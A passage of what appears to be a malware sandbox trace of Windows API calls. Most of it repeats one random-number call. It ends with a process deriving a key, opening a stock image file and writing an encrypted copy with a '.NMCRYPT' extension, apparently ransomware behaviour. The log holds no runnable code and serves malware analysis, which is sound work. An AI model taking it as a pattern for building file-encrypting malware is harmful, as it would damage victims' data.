dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.788] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.788] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.788] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.788] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.788] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.788] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.788] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.788] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.789] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.789] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.789] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.789] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.789] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.789] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.789] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.789] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.789] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.789] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.789] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.789] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.789] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.789] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.789] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.789] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.789] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.789] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.789] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.789] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.789] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.789] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.789] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.789] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.789] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.789] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.789] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.789] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.789] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.789] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.789] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.789] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.789] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.789] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.789] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.789] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.789] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.789] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.789] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.789] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.789] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.789] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.789] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.789] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.789] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.789] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.789] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.789] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.790] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.790] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.790] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.790] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.790] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.790] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.790] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.790] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.790] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.790] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.790] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.790] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.790] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.790] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.790] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.790] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.790] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.790] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.790] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.790] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.790] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.790] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.790] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.790] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.790] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.790] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.790] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.790] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.790] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.790] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.790] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.790] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.790] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.790] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.790] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.790] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.790] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.790] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.790] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.790] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.790] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.790] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.790] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.790] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.790] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.790] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.790] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.790] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.790] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.791] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.791] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.791] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.791] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.791] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.791] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.791] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.791] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.791] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.791] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.791] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.791] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.791] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.791] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.791] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.791] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.791] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.791] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.791] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.791] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.791] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.791] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.791] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.791] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.791] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.791] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.791] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.791] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.791] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.791] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.791] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.791] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.791] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.791] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.791] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.791] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.791] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.791] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.791] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.791] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.791] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.791] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.791] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.791] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.791] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.791] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.791] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.791] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.792] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.792] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.792] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.792] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.792] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.792] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.792] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.792] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.792] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.792] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.792] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.792] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.792] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.793] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.793] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.793] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.793] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.793] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.793] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.793] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.793] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0164.793] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0164.793] CryptCreateHash (in: hProv=0x8e2ef0, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x60d25c | out: phHash=0x60d25c) returned 1 [0164.793] CryptHashData (hHash=0x9ad738, pbData=0x2d7e6d0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0164.794] CryptDeriveKey (in: hProv=0x8e2ef0, Algid=0x6610, hBaseData=0x9ad738, dwFlags=0x4, phKey=0x60d260 | out: phKey=0x60d260*=0x9ad7f8) returned 1 [0164.794] CryptSetKeyParam (hKey=0x9ad7f8, dwParam=0x1, pbData=0x2d7e7d0, dwFlags=0x0) returned 1 [0164.794] CryptSetKeyParam (hKey=0x9ad7f8, dwParam=0x4, pbData=0x2d7e680*=0x1, dwFlags=0x0) returned 1 [0164.794] wcslen (_String="\\\\?\\") returned 0x4 [0164.794] CryptDuplicateKey (in: hKey=0x9ad7f8, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e654 | out: phKey=0x2d7e654*=0x9ad478) returned 1 [0164.794] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\OrangeCircles.jpg.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\orangecircles.jpg.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a4 [0164.794] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\OrangeCircles.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\orangecircles.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x690 [0164.794] GetFileSizeEx (in: hFile=0x690, lpFileSize=0x2d7e644 | out: lpFileSize=0x2d7e644*=6381) returned 1 [0164.794] WriteFile (in: hFile=0x6a4, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7e63c*=0x200, lpOverlapped=0x0) returned 1 [0164.795] ReadFile (in: hFile=0x690, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.796] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.796] GetLastError () returned 0x0 [0164.796] WriteFile (in: hFile=0x6a4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.797] ReadFile (in: hFile=0x690, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, 